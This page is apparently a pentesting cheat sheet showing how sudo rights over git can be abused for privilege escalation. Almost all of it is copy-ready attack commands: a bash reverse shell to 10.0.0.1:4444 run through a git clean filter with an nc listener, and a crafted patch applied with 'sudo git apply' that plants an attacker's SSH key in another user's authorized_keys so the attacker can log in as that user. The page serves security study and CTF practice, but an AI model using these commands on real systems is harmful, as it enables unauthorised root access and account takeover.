Sudo Git Privilege Escalation Sudo git is vulnerable to privilege escalation.
Copy sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
Copied!
If we can commit the git repository as root, we may be able to escalate privileges.
Copy echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell
Copied!
Copy # Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell
Copied!
Before committing, we need to start a listener in local machine.
Copy nc -lvnp 4444
Copied!
Then commit with sudo.
Copy sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
Copied!
Now we should get a shell in local terminal.
Copy sudo /usr/bin/git apply *
Copied!
If we can apply the patch for the git repository, we can update the content of arbitrary file.
Assume we are currently "user1" user then we want to escalate to be "user2".
First we create a new SSH key.
Copy cd /home/user1
ssh-keygen -t rsa
Enter file in which to save the key (/home/user1/.ssh/id_rsa): id_rsa
Copied!
New SSH keys (private/public) are generated under /home/user1
.
Next, add the content of id_rsa.pub
into authorized_keys.
.
Copy cat /home/user1/id_rsa.pub > /home/user1/.ssh/authorized_keys
Copied!
Then create a patch.
Copy cd /home
git diff user1/.bash_history user1/.ssh/authorized_keys > /tmp/patch
Copied!
After that, replace the name “user1” with “user2” in the patch file.
Copy sed -i 's/user1/user2/g' /tmp/patch
Copied!
Now we can apply the patch as root. This command update the target user’s ("user2") authorization_keys
to allow us to login with SSH key as "user2".
Copy sudo /usr/bin/git apply /tmp/patch
ssh -i /home/user1/.ssh/id_rsa user2@example.com